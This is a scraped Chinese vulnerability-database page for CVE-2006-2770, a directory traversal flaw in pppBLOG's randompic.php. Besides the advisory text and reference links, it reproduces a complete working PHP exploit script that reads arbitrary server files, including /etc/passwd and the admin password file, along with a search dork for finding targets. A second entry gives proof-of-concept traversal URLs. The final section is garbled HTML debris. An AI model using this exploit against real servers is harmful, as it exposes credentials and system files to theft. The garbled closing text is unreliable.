CVE-2006-2770
CVSS5.4
发布时间 :2006-06-02 06:18:00
修订时间 :2017-07-19 21:31:45
NMCOES    

[原文]Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated by file[0].


[CNNVD]PPPBlog Randompic.PHP 目录遍历漏洞(CNNVD-200606-048)

        pppBLOG 中的randompic.php存在目录遍历漏洞,当启用register_globals时,远程攻击者可通过"文件"数组参数的索引(该参数中包含..)序列读取任意文件。如通过file[0]。

- CVSS (基础分值)

CVSS分值: 5.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2770
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2770
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-048
(官方数据源) CNNVD

- 其它链接及资源

http://retrogod.altervista.org/pppblog_038_xpl.html
(UNKNOWN)  MISC  http://retrogod.altervista.org/pppblog_038_xpl.html
http://securityreason.com/securityalert/1015
(UNKNOWN)  SREASON  1015
http://securitytracker.com/id?1016198
(UNKNOWN)  SECTRACK  1016198
http://www.securityfocus.com/archive/1/archive/1/435406/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060530 pppBlog <= 0.3.8 administrative credentials/system disclosure
http://www.securityfocus.com/bid/18189
(UNKNOWN)  BID  18189
http://www.vupen.com/english/advisories/2006/2085
(UNKNOWN)  VUPEN  ADV-2006-2085
https://exchange.xforce.ibmcloud.com/vulnerabilities/26969
(UNKNOWN)  XF  pppblog-randompic-directory-traversal(26969)

- 漏洞信息

PPPBlog Randompic.PHP 目录遍历漏洞
中危 路径遍历
2006-06-02 00:00:00 2006-06-02 00:00:00
远程  
        pppBLOG 中的randompic.php存在目录遍历漏洞,当启用register_globals时,远程攻击者可通过"文件"数组参数的索引(该参数中包含..)序列读取任意文件。如通过file[0]。

- 公告与补丁

        暂无数据

- 漏洞信息 (1853)

pppBlog <= 0.3.8 (randompic.php) System Disclosure Exploit (EDBID:1853)
php webapps
2006-05-31 Verified
0 rgod
N/A [点击下载]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "pppBlog <= 0.3.8 system disclosure exploit\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: intext:\"Powered by pppblog\"\r\n\r\n";
/*
works with:
register_globals=On
*/

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path path_to_file OPTIONS\r\n";
echo "host:         target server (ip/hostname)\r\n";
echo "path:         path to pppblog\r\n";
echo "path_to_file: a file which you want to see content of\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /pppblog/ ../../../../../../etc/passwd\r\n";
echo "php ".$argv[0]." localhost /pppblog/ ../config/admin.php -p81\r\n";
echo "php ".$argv[0]." localhost / ../config/admin.php -P1.1.1.1:80\r\n\r\n";
die;
}
/* software site: http://joerg.jo.funpic.org/pppblog/static.php?page=welcome

vulnerable code in randompic.php at lines 66-68:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
readfile("$dir/$files[$randnum]");
...

if randompic.php is called directly, without arguments, $files array is
not initialized, so , if register_globals = On, you can see all
files on target server, according to open_basedir restrictions, poc:

http://[target]/[path]/randompic.php?files[0]=../config/admin.php

now at screen you have ppp-blog admin username/password pair, crypted by
crypt() php function
									      */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$path_to_file=$argv[3];
if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
$port=80;
$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}

$packet ="GET ".$p."randompic.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: files[0]=".urlencode($path_to_file)."\r\n"; //through cookies, log this :)
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
echo $html;
?>

# milw0rm.com [2006-05-31]
		

- 漏洞信息 (6972)

pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability (EDBID:6972)
php webapps
2008-11-03 Verified
0 JosS
N/A [点击下载]
# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# In memory of rgod ;)

*Requeriments: register_globals = On

vulnerable code in randompic.php at lines 66-72:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
    if (is_file($files[$randnum])){
	readfile("$dir/$files[$randnum]");
    }
}
...

poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd

linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).

tested on localhost with register_globals = On.

Hack0wn :D

# milw0rm.com [2008-11-03]
		

- 漏洞信息

25924
pppBLOG randompic.php files[0] Parameter Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Exploit Public

- 漏洞描述

漏洞类 width>Exploit show/cv_cnnvdid/CNNVD-200>- foi/t m h;}r -

Unknown or In" bo: foi/td"> foi/t m h;}rtd p=$p m h;}rtd p=$p mr9d="pm_info_discription" class="pm">- foexploit-db.com/exploits/6972/" target="_blank"> 漏洞类el> debug #ec:Verified <

Public-
未找>- foi/t m h;}r细节参考info_discription')"> - link>Bug q rde0530 pppBlog <= 0.3.8 administrative credentials/system disclos"http://w DBMlog 0.e0530 pppBlog <= 0. poc[1] = randompic.php?fals/system disclos"h53://w D30 pppBlog <= 0. poc[1] = randompic.pl/shBrs/system disclosl/sh://w DB方式Da)">asee0530 pppBlog <= 0.pppBlog <= 0.3.8 (randompals/system disclos"h53://w D30 pppBlog <= 0.og <= 0.3.11 (randompic.pBrs/system disclosl/sh://w DBCVE rde0530 pppBlog <href="http://cve.mitre.org/cgi-bin/cventr>
(UNKNOWN)  BID  18189 <>http://www.v://w DBMail L//w Pp HT0530 pppBlog <1/archis.neohapsicus.com/archis/bug q/:
<1/archis.neohapsicus.com/archis/bug q/:ge/trr URLT0530 pppBlog <calhost / ../config/admin.php -P1.1.1.1:80\r\n\r\n&="0" align="center">Ot of\Awww.vuy URLT0530 pppBlog <
未找>- r> nclick="pm('info_osvdb')"> -
  blic